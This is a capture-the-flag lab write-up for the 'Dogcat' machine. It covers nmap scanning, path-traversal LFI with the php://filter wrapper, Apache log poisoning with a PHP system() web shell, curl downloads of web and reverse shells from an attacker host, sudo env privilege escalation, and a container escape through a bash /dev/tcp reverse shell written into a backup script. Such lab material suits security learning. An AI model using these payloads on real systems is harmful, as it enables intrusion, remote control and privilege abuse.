🟠Dogcat

Dogcat

Description:

I made a website where you can look at pictures of dogs and/or cats!

Enumeration

NMAP

nmap -sCSV -O

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 09:02 EDT
Nmap scan report for 10.10.74.124
Host is up (0.72s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat

we have two doors open

80 running apache 2.4.38

and

22 running openssh

website

image

by clicking on "A dog"

by clicking on "A cat"

By analyzing the url, we can try to see other files besides the conventional ones, for example:

"Sorry, only dogs or cats are allowed."

this message leads us to think that the system checks whether we type "cat or dog" in the url

to bypass, we can use cat/../

that is, we will enter the folder "cats", we will leave and then we will go back to where we were but the url will pass in the verification

Does it work?

this tried to read the index.php but gave some error. but it worked

LFI

Local File Inclusion

we can read .php files from the server

trying to read files with other extensions we have this error:

"passwd.php"

the system adds the .php extension by default

we can try to read the file "index.php", without errors by coding it in base64 using "php Wrapper filter"

view=php://filter/convert.base64-encode/resource=cat/../index

decoding this base64 we can view the index.php source code and understand how it works

here we can see that the system only defines the extension when we do not define "ext".

we can read all files using "ext"

example, reading /etc/passwd

/?view=cat/../../../../../../../../etc/passwd&ext=

RCE

(Remote Code Execution)

in this case, we were able to scale from an LFI to a RCE by reading the log files

to read apache2 log files :

/?view=cat/../../../../../../../../var/log/apache2/access.log&ext=

now if we inject php code into the log, it will be executed, that we get a RCE

to do this I will use a proxy called burpsuite, to intercept the connection and inject code replacing the user agent

writing a shell

<?php echo system($_GET['cmd']); ?>

refreshing and viewing the source code :

it works!

now we can run commands in URL using &cmd=

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls

First flag

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=cat+flag.php

Web Shell

to see what we can use to get a web shell, we can list the machine's binaries

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls+/usr/bin

i will use curl to get a shell from my machine

in our machine:

installing the powny shell

wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O powny.php

sudo python3 -m http.server 80

now I will download the file and put it in /var/www/html

in the box machine (RCE)

view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=curl <your_ip>/powny.php -o /var/www/html/powny.php

it works

Second flag

image

Reverse Shell

we will use php-reverse-shell from pentest monkey

so

in our machine:

installing the rev shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

(use nano or vim to change the ip and port)

sudo python3 -m http.server 80

in the web shell :

curl <your_ip>/php-reverse-shell.php -o /var/www/html/shell.php

and now is just enter in:

/shell.php

Privilege Escalation

cd /tmp/

installing linpeas

in our machine:

installing the linpeas

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

sudo python3 -m http.server 80

in the reverse shell:

curl <your_ip>/linpeas.sh -o /tmp/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh > output.txt &

reading the output

cat output.txt

image

image

linpeas pointed to this binary (/usr/bin/env) as a 99% chance of being vulnerable to privilege escalation

checking in GTFObins about this binary

sudo env /bin/sh

image

third flag

image

Privelege escalation escalation?

as root. in the root (/) of the system we see:

which shows that docker is installed on this machine and we have to do a "Container escape"

so searching for scripts

find / -type f -name *.sh

we find : /opt/backups/backup.sh

this script compresses files from outside the container, so I will replace it with a reverse shell and it will be called from outside the container too

echo '#!/bin/bash' > /opt/backups/backup.sh

echo 'bash -i >& /dev/tcp//1234 0>&1' >> /opt/backups/backup.sh

and just wait

a few minutes later:

Fourth flag

image
PreviousBounty HackerNextBlog Posts

Last updated